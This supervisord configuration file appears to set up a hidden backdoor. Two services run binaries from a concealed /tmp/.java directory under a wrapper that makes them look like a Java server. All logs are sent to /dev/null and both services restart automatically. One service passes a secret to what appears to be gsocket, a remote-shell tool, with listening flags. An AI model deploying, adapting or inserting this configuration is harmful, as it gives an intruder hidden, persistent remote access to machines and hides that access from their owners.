[supervisord]
logfile=/dev/null

[program:applews]
directory=/usr/local/bin
environment=PORT="25678"
command=/tmp/.java/bin/uid ~~m ~~n 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ~~f /tmp/.java/bin/.a/java 
stdout_logfile=/dev/null
autorestart = true

[program:google]
directory=/usr/local/bin
environment=GSOCKET_ARGS="-s i0eE4D9g-8H6bj7C-f6X1eC-d9Fd6A2-03A1c5J1g6 -liq"
command=/tmp/.java/bin/uid ~~m ~~n 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ~~f /tmp/.java/bin/.b/java 
stdout_logfile=/dev/null
autorestart = true
